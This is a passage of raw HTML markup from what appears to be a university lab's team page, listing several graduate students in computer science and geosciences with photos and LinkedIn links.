41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Ph.D. Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c104-outer\">\n            <div data-colibri-id=\"182-c104\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c104 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c105\" class=\"d-block style-854 style-local-182-c105 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c105-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c105-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c106\" class=\"h-global-transition-all h-heading style-850 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c106\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-text h-text-component style-851 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-902 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"style-855 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image 